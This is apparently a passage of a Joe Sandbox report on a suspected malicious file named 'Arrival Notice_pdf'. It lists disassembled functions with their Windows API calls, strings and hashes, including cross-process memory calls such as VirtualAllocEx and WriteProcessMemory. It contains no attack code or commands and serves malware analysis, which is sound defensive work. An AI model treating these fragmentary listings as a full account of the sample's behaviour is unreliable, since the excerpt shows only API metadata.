Function 0027EC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0027EC94
GetWindowTextW.USER32(00000000,?,00000100), ref: 0027ECAB
MessageBeep.USER32(00000000), ref: 0027ECC3
KillTimer.USER32(?,0000040A), ref: 0027ECDF
EndDialog.USER32(?,00000001), ref: 0027ECF9

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: bfd308dcfc103fba4cf31a56f1f3d91de501a61dccdd18f424cd884c7d815f0c
Instruction ID: 08cd0194707a26e8ac0843d6f1488c1aec34ab591daaabcc2f624a21c4cfbf10
Opcode Fuzzy Hash: bfd308dcfc103fba4cf31a56f1f3d91de501a61dccdd18f424cd884c7d815f0c
Instruction Fuzzy Hash: E301D134510705ABEF255F10EE4EF9677BCFB04B05F0145AEB686A10E0DBF0AA64CB90

Function 0025B0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 0025B0BA
StrokeAndFillPath.GDI32(?,?,002BE680,00000000,?,?,?), ref: 0025B0D6
SelectObject.GDI32(?,00000000), ref: 0025B0E9
DeleteObject.GDI32 ref: 0025B0FC
StrokePath.GDI32(?), ref: 0025B117

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: b7bc17d4cc189fc0a7ab63cfb6ffffdbd02e16cd2a069c47740b3bd0ef2c3b0a
Instruction ID: 58bc7398810408e9bc6538b80337a95aa825fb91cbd1b207a09034729136aa33
Opcode Fuzzy Hash: b7bc17d4cc189fc0a7ab63cfb6ffffdbd02e16cd2a069c47740b3bd0ef2c3b0a
Instruction Fuzzy Hash: F8F0C930011649EFDB239F69EC1DB553BA9A710362F088326FC29550F0C7729969DF54

Function 0028F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0028F2DA
CoCreateInstance.OLE32(002CDA7C,00000000,00000001,002CD8EC,?), ref: 0028F2F2
CoUninitialize.OLE32 ref: 0028F555

Strings

.lnk, xrefs: 0028F28B, 0028F290, 0028F29E

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: cc74177405590c50327bfbf5c88561bbd18d32c909fdaac3fe1896f83a289634
Instruction ID: 5546c768ffa18695218b0efd9f67740caff6de06b2aae4b33a4039dad4fa94b4
Opcode Fuzzy Hash: cc74177405590c50327bfbf5c88561bbd18d32c909fdaac3fe1896f83a289634
Instruction Fuzzy Hash: 7EA16B71114201AFD304EF64C881EABB7ECEF99704F50492DF595972A2EB70EA19CB62

Function 0028E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 0024660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002453B1,?,?,002461FF,?,00000000,00000001,00000000), ref: 0024662F

CoInitialize.OLE32(00000000), ref: 0028E85D
CoCreateInstance.OLE32(002CDA7C,00000000,00000001,002CD8EC,?), ref: 0028E876
CoUninitialize.OLE32 ref: 0028E893

Part of subcall function 0024936C: __swprintf.LIBCMT ref: 002493AB
Part of subcall function 0024936C: __itow.LIBCMT ref: 002493DF

Strings

.lnk, xrefs: 0028E83B, 0028E84D

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 6011208175e772dfa9291139dd9661bd283f8176056d5d631c72cc74ccd077c0
Instruction ID: 256c3313c291e15ac5dcb356df0d28dd0b2b76e51239380ce0600c2bb5d5bee9
Opcode Fuzzy Hash: 6011208175e772dfa9291139dd9661bd283f8176056d5d631c72cc74ccd077c0
Instruction Fuzzy Hash: F9A143396143029FCB14EF14C484D2ABBE5BF89710F158998F99A9B3A2CB31EC55CF81

Function 0026325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 002632ED

Part of subcall function 0026E0D0: __87except.LIBCMT ref: 0026E10B

Strings

pow, xrefs: 002632C5, 002632E2

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: bca787a861f6f11c22d53d71fbe3fb94bac3fa6d151dbf3cc76345da741e3b45
Instruction ID: 0ca73bdf7d0a73515ac9627f8cc1a90fa858a0ed8ffb28bf6c4fba3813433d55
Opcode Fuzzy Hash: bca787a861f6f11c22d53d71fbe3fb94bac3fa6d151dbf3cc76345da741e3b45
Instruction Fuzzy Hash: B8517B75A39203D6CF11AF14D96137A2B94DB41710F308DA9F8C5822E9DF748EF8AA85

Function 00284606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,002DDC50,?,0000000F,0000000C,00000016,002DDC50,?), ref: 00284645

Part of subcall function 0024936C: __swprintf.LIBCMT ref: 002493AB
Part of subcall function 0024936C: __itow.LIBCMT ref: 002493DF

CharUpperBuffW.USER32(?,?,00000000,?), ref: 002846C5

Strings

REMOVE, xrefs: 00284676
THIS, xrefs: 00284703

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: BuffCharUpper$__itow__swprintf
String ID: REMOVE$THIS
API String ID: 3797816924-776492005
Opcode ID: a93a8059c5ec32c7abf6d7c9549e90a12c4d23474857812bf97b2851c7ec27e8
Instruction ID: c76afaf3f3ff23e0913b23ca7d1a3155e9cd7e391872d70baa3ec9ba22ff1c03
Opcode Fuzzy Hash: a93a8059c5ec32c7abf6d7c9549e90a12c4d23474857812bf97b2851c7ec27e8
Instruction Fuzzy Hash: BD41B338A2121A9FCF04FF54C881AAEB7B4FF45304F148069E916AB291D734DD65CF40

Function 0027C189 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0028430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0027BC08,?,?,00000034,00000800,?,00000034), ref: 00284335

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0027C1D3

Part of subcall function 002842D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,0027BC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00284300

Part of subcall function 0028422F: GetWindowThreadProcessId.USER32(?,?), ref: 0028425A
Part of subcall function 0028422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0027BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0028426A
Part of subcall function 0028422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0027BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00284280

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0027C240
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0027C28D

Strings

@, xrefs: 0027C2A5

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 18fbd936d5ee34fdff34b6e6361d00c804e7d4ee9202f70eb1d6ba3d922889a4
Instruction ID: 46ff2596b025b4dc748a009535066a578aa6033e4221e4fc22afe568f1a46076
Opcode Fuzzy Hash: 18fbd936d5ee34fdff34b6e6361d00c804e7d4ee9202f70eb1d6ba3d922889a4
Instruction Fuzzy Hash: A641497690121DBFDB11EFA4CC81AEEB7B8AF09300F108099FA45B7181DA71AE55CF61

Function 002AA63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,002DDC00,00000000,?,?,?,?), ref: 002AA6D8
GetWindowLongW.USER32 ref: 002AA6F5
SetWindowLongW.USER32(?,000000F0,00000000), ref: 002AA705

Strings

SysTreeView32, xrefs: 002AA6AA

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 158f3fb4f1e6b949d1e3abc8f676d393acf57eb21bdb1a7aa0fedb65ec19fd88
Instruction ID: 44366a2c3f6a533357311d4931100655f1b4e94dad4a6a59e1d42e2311b07fdb
Opcode Fuzzy Hash: 158f3fb4f1e6b949d1e3abc8f676d393acf57eb21bdb1a7aa0fedb65ec19fd88
Instruction Fuzzy Hash: 5931A031120606ABDF258E38DC45BEA77A9EF4A324F244725F975931E0CB70AC60CB54

Function 00295180 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00295190
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 002951C6

Strings

D), xrefs: 0029522E
|, xrefs: 002951B5

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |$D)
API String ID: 1413715105-3727512557
Opcode ID: 4dedf2883841854704f2e785e35d96c429fb7e8d6832448baa2ec4970c90dfd5
Instruction ID: 77270d34e88e5c804dcbd4a3b2a708518aa52d03457574127c2e8bfe45c17add
Opcode Fuzzy Hash: 4dedf2883841854704f2e785e35d96c429fb7e8d6832448baa2ec4970c90dfd5
Instruction Fuzzy Hash: 4A315971D21119ABCF05EFA4CC85AEEBFB8FF14700F100019EC04A6166DB71AA26CFA0

Function 002AA0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 002AA15E
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002AA172
SendMessageW.USER32(?,00001002,00000000,?), ref: 002AA196

Strings

SysMonthCal32, xrefs: 002AA129

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 86e6aedc2d2c68834015d67d13f38e1e8eb786fbd9ff698310886644f1c1eed8
Instruction ID: 44a9d0be717f9cfe9c5ebdb72b3a2a6731c6efb72786b6d5dd78554955b0da09
Opcode Fuzzy Hash: 86e6aedc2d2c68834015d67d13f38e1e8eb786fbd9ff698310886644f1c1eed8
Instruction Fuzzy Hash: A021AD32520219BBDF119F94CC46FEA3B79EF49714F110214FE59AB1D0DBB5A861CBA0

Function 002AA88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 002AA941
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 002AA94F
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 002AA956

Strings

msctls_updown32, xrefs: 002AA8BB

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: b7150048b38c6bf6fd1231fb31e4cfcf242766a77a95b085e39ef53930fb2e91
Instruction ID: 87e8b911caeb1eed6b4b1db1a34bf743d51f5edb6685aec121bcdbe6599d96c4
Opcode Fuzzy Hash: b7150048b38c6bf6fd1231fb31e4cfcf242766a77a95b085e39ef53930fb2e91
Instruction Fuzzy Hash: 8921A1B561020AAFEB11DF18DC91D7737ADEF5A3A4B050059FA049B261CB71EC21CB61

Function 002A99A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 002A9A30
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 002A9A40
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 002A9A65

Strings

Listbox, xrefs: 002A99FD

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: fd6cfdf4d036346bc3f4a6ef60659ac0a63c4b9a3a9964cea0178c67000727c4
Instruction ID: eeb705d84d5fbbc935173564a6de6f5277da8ec122901534960379fa5299bd6c
Opcode Fuzzy Hash: fd6cfdf4d036346bc3f4a6ef60659ac0a63c4b9a3a9964cea0178c67000727c4
Instruction Fuzzy Hash: 0221A732620119BFDF218F55DC85FBB3BAEEF8A750F118129F95497190CA719C61CBA0

Function 002AA409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 002AA46D
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 002AA482
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 002AA48F

Strings

msctls_trackbar32, xrefs: 002AA444

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 55ce680e12b38ff31b330a0ff4706c763deb569a1b8991b78422913d20d28c94
Instruction ID: 9ec05331b51b4aa26aeaebe654f6c6e959eff54f26e2f102b3b3084e0a54d244
Opcode Fuzzy Hash: 55ce680e12b38ff31b330a0ff4706c763deb569a1b8991b78422913d20d28c94
Instruction Fuzzy Hash: 5111E771220209BFEF205F64CC49FAB3B6DFF89754F014128FA45A6091D7B2E821DB24

Function 00262287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00262350,?), ref: 002622A1
GetProcAddress.KERNEL32(00000000), ref: 002622A8

Strings

combase.dll, xrefs: 0026229C
RoInitialize, xrefs: 00262290

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 2574300362-340411864
Opcode ID: c79631b7ea28475f482782aa1ed55e8fe8da03837946c940b4828086a52ee148
Instruction ID: efa6855198e2f797d95d76d60922088d3de243f3e7cd99ab993e9c77d1a9b22c
Opcode Fuzzy Hash: c79631b7ea28475f482782aa1ed55e8fe8da03837946c940b4828086a52ee148
Instruction Fuzzy Hash: 1DE012B8AA1301ABDB695F71FC5EF243A68BB01B16F008039B506E60A0CFB544A4CF08

Function 0026235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00262276), ref: 00262376
GetProcAddress.KERNEL32(00000000), ref: 0026237D

Strings

RoUninitialize, xrefs: 00262365
combase.dll, xrefs: 00262371

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 2574300362-2819208100
Opcode ID: 956bc7b72621350f3b2ec2af19c3692f4f5227ce5d3ca0a93f6db06d905a3703
Instruction ID: c6d8ef80296895bb1168e6d92b08c8288494ebf6a4ddcdc24a248ff4571c33a8
Opcode Fuzzy Hash: 956bc7b72621350f3b2ec2af19c3692f4f5227ce5d3ca0a93f6db06d905a3703
Instruction Fuzzy Hash: 94E0ECB8556301EFDB2A5F61FD1EF143A68B704B02F104479F60DE25B0CBB95464CB15

Function 002BAC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 002BAC60
__swprintf.LIBCMT ref: 002BAC94

Strings

WIN_XPe, xrefs: 002BACD3
%.3d, xrefs: 002BAC6E

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 1987414da9da413f0df6bd8374cc1b43460e69eb715a752e28a1fa1a8c543a89
Instruction ID: a30dfa29536cca1101a4e0425f8143025da7ffa1fa9a955d3ffc8c39bbdbae1b
Opcode Fuzzy Hash: 1987414da9da413f0df6bd8374cc1b43460e69eb715a752e28a1fa1a8c543a89
Instruction Fuzzy Hash: 23E0EC7183461C9BCA1197509D45DFAB77CA704781F5400A3B906A1010E6B5ABB4AA22

Function 002A2205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,002A21FB,?,002A23EF), ref: 002A2213
GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 002A2225

Strings

kernel32.dll, xrefs: 002A220E
GetProcessId, xrefs: 002A221F

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetProcessId$kernel32.dll
API String ID: 2574300362-399901964
Opcode ID: 9063436457c90fd0c01a7f9ed889fce4a96ff6b98d98676d3507927e8bfa03ff
Instruction ID: d88de2a0145a381faa872d495e51d765abc99c16e6fd4746a3ab3b3318827ef6
Opcode Fuzzy Hash: 9063436457c90fd0c01a7f9ed889fce4a96ff6b98d98676d3507927e8bfa03ff
Instruction Fuzzy Hash: 6BD05E34820717DFE7215F24B808A12B6D8AB06300B144439EC45A2150DAB0D8988750

Function 002442F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

